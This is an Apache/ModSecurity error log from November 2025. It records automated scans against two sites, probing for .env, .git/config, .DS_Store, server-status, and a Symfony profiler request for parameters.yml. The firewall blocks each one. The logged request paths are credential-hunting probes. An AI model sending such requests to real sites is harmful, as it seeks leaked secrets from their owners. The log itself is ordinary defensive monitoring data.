[Tue Nov 04 19:36:39.578463 2025] [:error] [pid 4009518] [client 165.227.84.14:33824] [client 165.227.84.14] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQpHt5WDWEWQMqAS4zJlzwAAAA0"]
[Tue Nov 04 19:36:39.578673 2025] [:error] [pid 4009518] [client 165.227.84.14:33824] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQpHt5WDWEWQMqAS4zJlzwAAAA0"]
[Tue Nov 04 19:36:39.578834 2025] [:error] [pid 4009518] [client 165.227.84.14:33824] [client 165.227.84.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQpHt5WDWEWQMqAS4zJlzwAAAA0"]
[Tue Nov 04 19:36:39.872491 2025] [:error] [pid 4009524] [client 165.227.84.14:33828] [client 165.227.84.14] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQpHtzN5HJozj73xCA4zOQAAABE"]
[Tue Nov 04 19:36:39.872824 2025] [:error] [pid 4009524] [client 165.227.84.14:33828] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQpHtzN5HJozj73xCA4zOQAAABE"]
[Tue Nov 04 19:36:39.873034 2025] [:error] [pid 4009524] [client 165.227.84.14:33828] [client 165.227.84.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQpHtzN5HJozj73xCA4zOQAAABE"]
[Tue Nov 04 23:39:30.749040 2025] [authz_core:error] [pid 4012587] [client 68.183.9.16:42690] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Nov 04 23:39:31.193234 2025] [:error] [pid 4015429] [client 68.183.9.16:42708] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQqAo7XA2KZENyYkkhud9QAAAAE"]
[Tue Nov 04 23:39:31.193476 2025] [:error] [pid 4015429] [client 68.183.9.16:42708] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQqAo7XA2KZENyYkkhud9QAAAAE"]
[Tue Nov 04 23:39:31.193641 2025] [:error] [pid 4015429] [client 68.183.9.16:42708] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQqAo7XA2KZENyYkkhud9QAAAAE"]
[Tue Nov 04 23:39:31.337476 2025] [:error] [pid 4012593] [client 68.183.9.16:42710] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQqAo7EfJm1vmv9kKoGzQQAAAAw"]
[Tue Nov 04 23:39:31.337686 2025] [:error] [pid 4012593] [client 68.183.9.16:42710] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQqAo7EfJm1vmv9kKoGzQQAAAAw"]
[Tue Nov 04 23:39:31.337868 2025] [:error] [pid 4012593] [client 68.183.9.16:42710] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQqAo7EfJm1vmv9kKoGzQQAAAAw"]
[Tue Nov 04 23:39:31.457673 2025] [:error] [pid 4009518] [client 68.183.9.16:42726] [client 68.183.9.16] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQqAo5WDWEWQMqAS4zJl8QAAAA0"]
[Tue Nov 04 23:39:31.457880 2025] [:error] [pid 4009518] [client 68.183.9.16:42726] [client 68.183.9.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQqAo5WDWEWQMqAS4zJl8QAAAA0"]
[Tue Nov 04 23:39:31.458064 2025] [:error] [pid 4009518] [client 68.183.9.16:42726] [client 68.183.9.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQqAo5WDWEWQMqAS4zJl8QAAAA0"]
[Wed Nov 05 03:20:02.568809 2025] [:error] [pid 4020852] [client 176.65.148.212:58568] [client 176.65.148.212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQq0UiHDgcs_HU2djVvh4gAAAAI"]
[Wed Nov 05 03:20:02.569093 2025] [:error] [pid 4020852] [client 176.65.148.212:58568] [client 176.65.148.212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQq0UiHDgcs_HU2djVvh4gAAAAI"]
[Wed Nov 05 03:20:02.569261 2025] [:error] [pid 4020852] [client 176.65.148.212:58568] [client 176.65.148.212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQq0UiHDgcs_HU2djVvh4gAAAAI"]
[Wed Nov 05 04:14:55.072364 2025] [authz_core:error] [pid 4021993] [client 209.38.248.17:44240] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 05 04:14:56.317904 2025] [:error] [pid 4021995] [client 209.38.248.17:44276] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQrBMMgBJVUwQ0sPoc42ZwAAAAk"]
[Wed Nov 05 04:14:56.319537 2025] [:error] [pid 4021995] [client 209.38.248.17:44276] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQrBMMgBJVUwQ0sPoc42ZwAAAAk"]
[Wed Nov 05 04:14:56.319794 2025] [:error] [pid 4021995] [client 209.38.248.17:44276] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQrBMMgBJVUwQ0sPoc42ZwAAAAk"]
[Wed Nov 05 04:14:56.561035 2025] [:error] [pid 4021317] [client 209.38.248.17:44292] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQrBMOc2AMvhnL1NILUc2AAAAAY"]
[Wed Nov 05 04:14:56.561249 2025] [:error] [pid 4021317] [client 209.38.248.17:44292] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQrBMOc2AMvhnL1NILUc2AAAAAY"]
[Wed Nov 05 04:14:56.561412 2025] [:error] [pid 4021317] [client 209.38.248.17:44292] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQrBMOc2AMvhnL1NILUc2AAAAAY"]
[Wed Nov 05 04:14:56.816060 2025] [:error] [pid 4020852] [client 209.38.248.17:44304] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQrBMCHDgcs_HU2djVvh6gAAAAI"]
[Wed Nov 05 04:14:56.816274 2025] [:error] [pid 4020852] [client 209.38.248.17:44304] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQrBMCHDgcs_HU2djVvh6gAAAAI"]
[Wed Nov 05 04:14:56.816440 2025] [:error] [pid 4020852] [client 209.38.248.17:44304] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQrBMCHDgcs_HU2djVvh6gAAAAI"]
[Wed Nov 05 14:14:32.616635 2025] [authz_core:error] [pid 4020850] [client 157.230.19.140:39142] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 05 14:14:34.161027 2025] [:error] [pid 4020853] [client 157.230.19.140:39164] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQtNuv3TXlTMh1-02t63wQAAAAM"]
[Wed Nov 05 14:14:34.161250 2025] [:error] [pid 4020853] [client 157.230.19.140:39164] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQtNuv3TXlTMh1-02t63wQAAAAM"]
[Wed Nov 05 14:14:34.161446 2025] [:error] [pid 4020853] [client 157.230.19.140:39164] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQtNuv3TXlTMh1-02t63wQAAAAM"]
[Wed Nov 05 14:14:34.586858 2025] [:error] [pid 4020854] [client 157.230.19.140:44928] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQtNujU5Ji-RiWsyqom0egAAAAQ"]
[Wed Nov 05 14:14:34.588109 2025] [:error] [pid 4020854] [client 157.230.19.140:44928] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQtNujU5Ji-RiWsyqom0egAAAAQ"]
[Wed Nov 05 14:14:34.588316 2025] [:error] [pid 4020854] [client 157.230.19.140:44928] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQtNujU5Ji-RiWsyqom0egAAAAQ"]
[Wed Nov 05 14:14:34.934764 2025] [:error] [pid 4020852] [client 157.230.19.140:44944] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQtNuiHDgcs_HU2djVviqQAAAAI"]
[Wed Nov 05 14:14:34.935009 2025] [:error] [pid 4020852] [client 157.230.19.140:44944] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQtNuiHDgcs_HU2djVviqQAAAAI"]
[Wed Nov 05 14:14:34.935193 2025] [:error] [pid 4020852] [client 157.230.19.140:44944] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQtNuiHDgcs_HU2djVviqQAAAAI"]
[Wed Nov 05 19:04:30.347478 2025] [:error] [pid 4035994] [client 176.65.148.212:55050] [client 176.65.148.212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQuRrj2-3voq1DyQZlmwDAAAAA4"]
[Wed Nov 05 19:04:30.348450 2025] [:error] [pid 4035994] [client 176.65.148.212:55050] [client 176.65.148.212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQuRrj2-3voq1DyQZlmwDAAAAA4"]
[Wed Nov 05 19:04:30.348652 2025] [:error] [pid 4035994] [client 176.65.148.212:55050] [client 176.65.148.212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQuRrj2-3voq1DyQZlmwDAAAAA4"]
[Thu Nov 06 00:49:24.667039 2025] [:error] [pid 4043130] [client 158.51.121.183:53924] [client 158.51.121.183] ModSecurity: Warning. Matched phrase "parameters.yml" at ARGS:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: parameters.yml found within ARGS:file: app/config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aQvihHgbOp2T5WcLy2MQZgAAAAA"]
